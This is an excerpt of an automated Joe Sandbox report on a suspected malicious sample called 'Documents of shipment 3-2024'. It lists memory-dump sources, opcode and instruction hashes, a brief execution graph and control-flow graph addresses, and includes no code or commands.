                                              • Instruction ID: 23e7f3ff5fefd0184fbe8dc6b326592e3cb485f5f472e1e73889ecc65daf1a58
                                              • Opcode Fuzzy Hash: 16d55529a08d724f995bf2486f6ffa056f0517dc2df8722ce789b536010c17d2
                                              • Instruction Fuzzy Hash: BEE0DFBAC8E680DBCF420E14CCCAA5677A1FB13215B2401E2D8982E04BE7654217EE62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b30242daf1363b8b6a601f8824764d21f7c0d2a8dabe458c63c3f4f21b962dcb
                                              • Instruction ID: 23000d0431b25f990c42efeb863353ebdc7735067be8892439c4870ba4ffe962
                                              • Opcode Fuzzy Hash: b30242daf1363b8b6a601f8824764d21f7c0d2a8dabe458c63c3f4f21b962dcb
                                              • Instruction Fuzzy Hash: 20E08630901308EBCB04EF54E4059ADBF75EB42311F10816DE84427350CB359A51DF95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9b10a42709fbcb92f9668f97a45f2b83ba9b335c1cf8704cbc61be7ae15eae1
                                              • Instruction ID: f2d34800e029ef62cecda07abfae48ec4d17b4caedcd451f39a446f2a42341a4
                                              • Opcode Fuzzy Hash: a9b10a42709fbcb92f9668f97a45f2b83ba9b335c1cf8704cbc61be7ae15eae1
                                              • Instruction Fuzzy Hash: 53E0EC39A00508DFC714DE59D840598F7A1EBD9316F50D0A6A6199B314DA3199538B94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5757d8162c110d530be81985ccc984d4ba6c7f7c3e9f3547535d2efa0a2bfb89
                                              • Instruction ID: 165d376f1b01e54ffdfa0347dbc90354a0c5f3306455bad683c207817acf0bdc
                                              • Opcode Fuzzy Hash: 5757d8162c110d530be81985ccc984d4ba6c7f7c3e9f3547535d2efa0a2bfb89
                                              • Instruction Fuzzy Hash: 22E01270D51308DFC780EFB8D48565CBFF4EB04201F1041A9D80893340EA345A44DB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04cfd8851fda76716bfe600989ace2ac3512ad3fe767378494d185a2e76477bc
                                              • Instruction ID: 9cc4d1985a98f2fb7165db23dd5cb41b720251dc79b572bf915c0f66fcfc4801
                                              • Opcode Fuzzy Hash: 04cfd8851fda76716bfe600989ace2ac3512ad3fe767378494d185a2e76477bc
                                              • Instruction Fuzzy Hash: 2FD0123901B3C05FC70367646E248917F76BF5320830940C3E0809A173C6290A1DE771
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fa8616bbb7dcff6d490ea3abb9d1e831f2308cdcc8977e0da9655880e538adc6
                                              • Instruction ID: 61803d2cb2125815ad458e7ed8f7f3cbcd5d2e9e6466195268e3562dac6a29ee
                                              • Opcode Fuzzy Hash: fa8616bbb7dcff6d490ea3abb9d1e831f2308cdcc8977e0da9655880e538adc6
                                              • Instruction Fuzzy Hash: 7CC0127405E7C0EFD306927418184616F61E9A32003094587A194850579224192786B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d7d214c699f57ebd775b738e8c90415fc44ab6ef492d101a702a3d1ca80ae1cc
                                              • Instruction ID: 9f7f87d41ce0b906f647d19235aa14ebcb92421beb0e7722fe2e918b78f38d79
                                              • Opcode Fuzzy Hash: d7d214c699f57ebd775b738e8c90415fc44ab6ef492d101a702a3d1ca80ae1cc
                                              • Instruction Fuzzy Hash: 17D06C78908229CBEB20EB618840B99BAB2BB48300F54D1E9D459A3309D7306E809F62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ac49b661ea57caefcace820cf61e710a24fcf6a891c28b6ebb72498ce5696f5
                                              • Instruction ID: efc11a34348fdf715f2e5406e7828e4da4eb88948c565a736c7e17bd70fa45f6
                                              • Opcode Fuzzy Hash: 0ac49b661ea57caefcace820cf61e710a24fcf6a891c28b6ebb72498ce5696f5
                                              • Instruction Fuzzy Hash: 3BC0127544C654CFDB005F10C4AE64A7B65FB11349F0001E5C8592F05AD3780546DF72
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67e26c05587daf23b0da7b2a619ffe640aaa5550af38c246789db55a893924bf
                                              • Instruction ID: 1fc90929aaa5f8ecdb0cdcb52c6515ef2418c98f71d6a65d77827899dca4ed7a
                                              • Opcode Fuzzy Hash: 67e26c05587daf23b0da7b2a619ffe640aaa5550af38c246789db55a893924bf
                                              • Instruction Fuzzy Hash: 91C04C31090748C7EA546BA4B44E37CBBB8A741B1BF581426E50D81460CFB85491D76B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b33641d31eed6cc3bbed2eb5a4967e7e7e1a2658469de0ac581f9755e7bfb514
                                              • Instruction ID: 1abded0514fac20e49d1de72000e7c29e3d6facbbe68095c8c0f12f0f321ee87
                                              • Opcode Fuzzy Hash: b33641d31eed6cc3bbed2eb5a4967e7e7e1a2658469de0ac581f9755e7bfb514
                                              • Instruction Fuzzy Hash: 32C00275E05208CFCB54EFE4E2955ACBBF5EF59311B609019E40BAB249DA382E098B15
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ebd0f89ada03c96d65ff6e8ff5304fa19f85177d2d4238035d5ee8fa428537c
                                              • Instruction ID: d107371424ae92579985ec2224c4dbbb9355e33f0225858b2e52f9eb0adc88c5
                                              • Opcode Fuzzy Hash: 1ebd0f89ada03c96d65ff6e8ff5304fa19f85177d2d4238035d5ee8fa428537c
                                              • Instruction Fuzzy Hash: 80C09B39055104EFC715B750C998D1EB6A5FFD5301FC4C851E14546035DA31C559E737
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b480322b7e86bc566530dfcf557b03da5bae97927fd63bfe851c05715d5bfe65
                                              • Instruction ID: 33859ecd016a5b478c894098bd4baf1d487228d86203522a6d338926c97407bf
                                              • Opcode Fuzzy Hash: b480322b7e86bc566530dfcf557b03da5bae97927fd63bfe851c05715d5bfe65
                                              • Instruction Fuzzy Hash: 5DB012F91ED600F691043360C898B2FF050FFB2B01BD0CC02B30640128C87044649A3F
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf35198c755068f56340e43254c9aa4c461fb6ff4af46b2032b511d89b232c47
                                              • Instruction ID: 0be12946b9dea19b46cc71af4ac6fc954ca70799fe8539a70b2370fc9c017499
                                              • Opcode Fuzzy Hash: cf35198c755068f56340e43254c9aa4c461fb6ff4af46b2032b511d89b232c47
                                              • Instruction Fuzzy Hash: 81C04878A4432CDFCB20EF609845BAEBAB0BB0A342F841295E446A2204E7305942CE36
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de6a0a732fb4af0c6d6ed376c2095d2c641c55c8fdd5ea911653d20ca4ec9748
                                              • Instruction ID: 14e1ad19bec70e7ea60dd3f6d6acbdc6eb725997633aae7af0c84ffbe4229788
                                              • Opcode Fuzzy Hash: de6a0a732fb4af0c6d6ed376c2095d2c641c55c8fdd5ea911653d20ca4ec9748
                                              • Instruction Fuzzy Hash: A8B01231321000DFC7415B64E9054583F21FF482193A01188F0080E121C733C453CB80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ee4f8c53997dabaf026b0ca23232487da1c826d5d0e7969388bdc67d015dd16
                                              • Instruction ID: cea94bf780e5e73397945d440a48e29a373fdc6e58b7c11bad3ff35c4727e941
                                              • Opcode Fuzzy Hash: 0ee4f8c53997dabaf026b0ca23232487da1c826d5d0e7969388bdc67d015dd16
                                              • Instruction Fuzzy Hash: 4BE11C74E002598FDB54DFA8C580AAEFBF2FF89314F24816AD415AB355D730A981CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ce5986f141818125b5e1117738a692ef13e8a0839bdb49e37e691b9ec58487c2
                                              • Instruction ID: c7f37205243cfe3927910fcff9a398905a2ff601a2269fd652cd80cb349e7554
                                              • Opcode Fuzzy Hash: ce5986f141818125b5e1117738a692ef13e8a0839bdb49e37e691b9ec58487c2
                                              • Instruction Fuzzy Hash: CBE10974E41219CFDB14DFA8C580AAEFBF2BF89305F24816AD415AB359DB309941CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e966cd863a3afb443ec041fee5040a22e7cebd5a4fe92c607ff3d9b742f3e254
                                              • Instruction ID: e5146e605d34f3fb3620c92e4cb6a043b2d5e81857740e245584f82379b62cf1
                                              • Opcode Fuzzy Hash: e966cd863a3afb443ec041fee5040a22e7cebd5a4fe92c607ff3d9b742f3e254
                                              • Instruction Fuzzy Hash: 33E1E874E41219CFDB14DFA9C580AAEFBF2BF89305F24816AD415AB359DB309941CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aa364224e8e7bf1214dfae4dacd4bf0c0873fcfd2c2cfd98f523748ee84f0e53
                                              • Instruction ID: bce28b7959aad3c8b17b882df53129db1c97746e0cf40fa801f279e082545fcd
                                              • Opcode Fuzzy Hash: aa364224e8e7bf1214dfae4dacd4bf0c0873fcfd2c2cfd98f523748ee84f0e53
                                              • Instruction Fuzzy Hash: 80D18B74E002188FCB54CF59C594BEDBBF2BF89314F6481AAD419AB252D771DC82CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bbcbd4491f0b3ba9af27dea2ec68012c92362a720afcad396f9851b75b3eee2f
                                              • Instruction ID: 967fbe2182509324640cf86d0a6331423f5f0a89613d13ec9b038210d2dfd3c2
                                              • Opcode Fuzzy Hash: bbcbd4491f0b3ba9af27dea2ec68012c92362a720afcad396f9851b75b3eee2f
                                              • Instruction Fuzzy Hash: FDE1F874E002198FDB54DFA9C580AAEFBF2FF89304F24816AD415AB356D731A981CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ccf7f9365092705fc0f824b0c31ebfc86d96510ebee1dbd740be0a29d8b2cccb
                                              • Instruction ID: 73311343fe0faed7ac325c2ce6e6d9a9190b630a8d9da2ba8008c878fc1934c1
                                              • Opcode Fuzzy Hash: ccf7f9365092705fc0f824b0c31ebfc86d96510ebee1dbd740be0a29d8b2cccb
                                              • Instruction Fuzzy Hash: D5E11874E002598FDB54DFA9C590AAEFBF2FF89300F24826AD415AB356D730A941CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b346b522d2fe79304a6161728ad593672bff36ec41e9748b1e9d95505cad7bd2
                                              • Instruction ID: 0ee8f3effd694e75bdd560108cdd36f6347fcd35b945cbb01dab54b5ab0fdc69
                                              • Opcode Fuzzy Hash: b346b522d2fe79304a6161728ad593672bff36ec41e9748b1e9d95505cad7bd2
                                              • Instruction Fuzzy Hash: A0D1E63192075A8ACB01EB64D8907DDF7B1FF99300F50C79AE4497B225EB70AAC5CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 154588724b8c63bf0e2cbf08ab3085598d73a867d22b36af5d147a296ee138e4
                                              • Instruction ID: 7876915887f6910d24558928417d0ee7a4c35c3624688f7b1a91a3e2f5ffd8f9
                                              • Opcode Fuzzy Hash: 154588724b8c63bf0e2cbf08ab3085598d73a867d22b36af5d147a296ee138e4
                                              • Instruction Fuzzy Hash: A9D1E63192075A8ACB01EB64D8907DDF7B1FF99300F50C79AE4497B225EB70AAC5CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be71b7553c73ffba569363d10ba7516a4303f367c44abc12581afaf9aaf05391
                                              • Instruction ID: 690c484dfc717ecf4f6d73e03f764448a3fe7f100140877c212767b1742494af
                                              • Opcode Fuzzy Hash: be71b7553c73ffba569363d10ba7516a4303f367c44abc12581afaf9aaf05391
                                              • Instruction Fuzzy Hash: 8B511D70E45219CFDB14DFA9C5809AEFBF2BF89305F24816AD418AB31ADB319941CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1420fc48cb761d4a70c961f8860971c4a55c7c40dbda7d308605f0696ef7c68f
                                              • Instruction ID: 1818a84a3ad0a0793f6567c89a81e7e59c555d4554ab9c9a389e2c94f875a7e6
                                              • Opcode Fuzzy Hash: 1420fc48cb761d4a70c961f8860971c4a55c7c40dbda7d308605f0696ef7c68f
                                              • Instruction Fuzzy Hash: DF412B79E6510B8FDF10CFA9E581AADF3F1BF49300B24E215E01AEB254DB359945CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:11.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:3
                                              Total number of Limit Nodes:0
                                              execution_graph 27986 66de278 27987 66de2be GlobalMemoryStatusEx 27986->27987 27988 66de2ee 27987->27988
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c588ba47aa848a3b0bef3978dc96d2b4060bfdc3b5c168bae6805867734244d2
                                              • Instruction ID: 7587fc1db0f83f0bc6021e70b08760d1d65464451a5b71b135a45d0fb95f7507
                                              • Opcode Fuzzy Hash: c588ba47aa848a3b0bef3978dc96d2b4060bfdc3b5c168bae6805867734244d2
                                              • Instruction Fuzzy Hash: 7E63FC31D10B198ADB51EF68C8806ADF7B1FF99300F15C79AE4587B121EB70AAD5CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0c210cbfaef6d83b9d5706668858a02f9edeea0136ecb79202d6a3f7b9af4ebd
                                              • Instruction ID: 3e37f2da698dfa37f113408b616736656d8b93f19711e554d6f62b62a22df11e
                                              • Opcode Fuzzy Hash: 0c210cbfaef6d83b9d5706668858a02f9edeea0136ecb79202d6a3f7b9af4ebd
                                              • Instruction Fuzzy Hash: 4333FB31D106198EDB11EF68C880A9DF7B1FF99300F55C69AD459AB221EB70EAC5CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V"m
                                              • API String ID: 0-1545561793
                                              • Opcode ID: b3b0ea8edbc23d2ceeca962c112c571ab69d4236eb49fda7d94fcc4f088a2413
                                              • Instruction ID: e18c499bff639bbab8245203bfb3073cc7de03074bfca114383cea34995ebe0d
                                              • Opcode Fuzzy Hash: b3b0ea8edbc23d2ceeca962c112c571ab69d4236eb49fda7d94fcc4f088a2413
                                              • Instruction Fuzzy Hash: 4B913D70E00209DFDF24CFADD9857AEBBF2BF88314F148529E455AB294DB749845CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 13bf6d32270070365e41571163d776bd675eac0199bc13cd316824cfab22748a
                                              • Instruction ID: daf6323fe1a1ea8d2b893a8e85b539a019df6a34229c092252aa1ad3934e330d
                                              • Opcode Fuzzy Hash: 13bf6d32270070365e41571163d776bd675eac0199bc13cd316824cfab22748a
                                              • Instruction Fuzzy Hash: B9327B75A002058FDB24DFACD484BADBBB2FB88314F248569E909EB395DB74DC41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d39142f687f27249bb1ce07e5109072887ab8b5a4016ab8e3375ea39f44c3018
                                              • Instruction ID: e51634e4b1f2cf4000368aaa727f1dfba6ca7279eb3685cccb5dd07c9447ed5d
                                              • Opcode Fuzzy Hash: d39142f687f27249bb1ce07e5109072887ab8b5a4016ab8e3375ea39f44c3018
                                              • Instruction Fuzzy Hash: 0FB13E70E002098FEF24DFADD8857AEBBF2BF88314F148529D815AB654EB749845CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2326 15d4810-15d489c 2329 15d489e-15d48a9 2326->2329 2330 15d48e6-15d48e8 2326->2330 2329->2330 2331 15d48ab-15d48b7 2329->2331 2332 15d48ea-15d4902 2330->2332 2333 15d48b9-15d48c3 2331->2333 2334 15d48da-15d48e4 2331->2334 2339 15d494c-15d494e 2332->2339 2340 15d4904-15d490f 2332->2340 2335 15d48c5 2333->2335 2336 15d48c7-15d48d6 2333->2336 2334->2332 2335->2336 2336->2336 2338 15d48d8 2336->2338 2338->2334 2342 15d4950-15d4995 2339->2342 2340->2339 2341 15d4911-15d491d 2340->2341 2343 15d491f-15d4929 2341->2343 2344 15d4940-15d494a 2341->2344 2350 15d499b-15d49a9 2342->2350 2345 15d492d-15d493c 2343->2345 2346 15d492b 2343->2346 2344->2342 2345->2345 2348 15d493e 2345->2348 2346->2345 2348->2344 2351 15d49ab-15d49b1 2350->2351 2352 15d49b2-15d4a0f 2350->2352 2351->2352 2359 15d4a1f-15d4a23 2352->2359 2360 15d4a11-15d4a15 2352->2360 2362 15d4a25-15d4a29 2359->2362 2363 15d4a33-15d4a37 2359->2363 2360->2359 2361 15d4a17-15d4a1a call 15d0ab8 2360->2361 2361->2359 2362->2363 2364 15d4a2b-15d4a2e call 15d0ab8 2362->2364 2365 15d4a39-15d4a3d 2363->2365 2366 15d4a47-15d4a4b 2363->2366 2364->2363 2365->2366 2369 15d4a3f 2365->2369 2370 15d4a4d-15d4a51 2366->2370 2371 15d4a5b 2366->2371 2369->2366 2370->2371 2372 15d4a53 2370->2372 2373 15d4a5c 2371->2373 2372->2371 2373->2373
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \V"m$\V"m
                                              • API String ID: 0-1148475557
                                              • Opcode ID: 05510953ff73196551f8743e09ad49d45f361a86f6b46fe1fb635aa4ad5571bc
                                              • Instruction ID: ca041df749efa6f2ddcfbbc14bca9fdfe9d86c8c82a4fb9f06afd4692ac9b29b
                                              • Opcode Fuzzy Hash: 05510953ff73196551f8743e09ad49d45f361a86f6b46fe1fb635aa4ad5571bc
                                              • Instruction Fuzzy Hash: 2F714A70E00249CFDB24DFADC8857AEBBF2BF88314F148529E415AB654EB749842CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2374 15d4804-15d489c 2377 15d489e-15d48a9 2374->2377 2378 15d48e6-15d48e8 2374->2378 2377->2378 2379 15d48ab-15d48b7 2377->2379 2380 15d48ea-15d4902 2378->2380 2381 15d48b9-15d48c3 2379->2381 2382 15d48da-15d48e4 2379->2382 2387 15d494c-15d494e 2380->2387 2388 15d4904-15d490f 2380->2388 2383 15d48c5 2381->2383 2384 15d48c7-15d48d6 2381->2384 2382->2380 2383->2384 2384->2384 2386 15d48d8 2384->2386 2386->2382 2390 15d4950-15d4962 2387->2390 2388->2387 2389 15d4911-15d491d 2388->2389 2391 15d491f-15d4929 2389->2391 2392 15d4940-15d494a 2389->2392 2397 15d4969-15d4995 2390->2397 2393 15d492d-15d493c 2391->2393 2394 15d492b 2391->2394 2392->2390 2393->2393 2396 15d493e 2393->2396 2394->2393 2396->2392 2398 15d499b-15d49a9 2397->2398 2399 15d49ab-15d49b1 2398->2399 2400 15d49b2-15d4a0f 2398->2400 2399->2400 2407 15d4a1f-15d4a23 2400->2407 2408 15d4a11-15d4a15 2400->2408 2410 15d4a25-15d4a29 2407->2410 2411 15d4a33-15d4a37 2407->2411 2408->2407 2409 15d4a17-15d4a1a call 15d0ab8 2408->2409 2409->2407 2410->2411 2412 15d4a2b-15d4a2e call 15d0ab8 2410->2412 2413 15d4a39-15d4a3d 2411->2413 2414 15d4a47-15d4a4b 2411->2414 2412->2411 2413->2414 2417 15d4a3f 2413->2417 2418 15d4a4d-15d4a51 2414->2418 2419 15d4a5b 2414->2419 2417->2414 2418->2419 2420 15d4a53 2418->2420 2421 15d4a5c 2419->2421 2420->2419 2421->2421
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
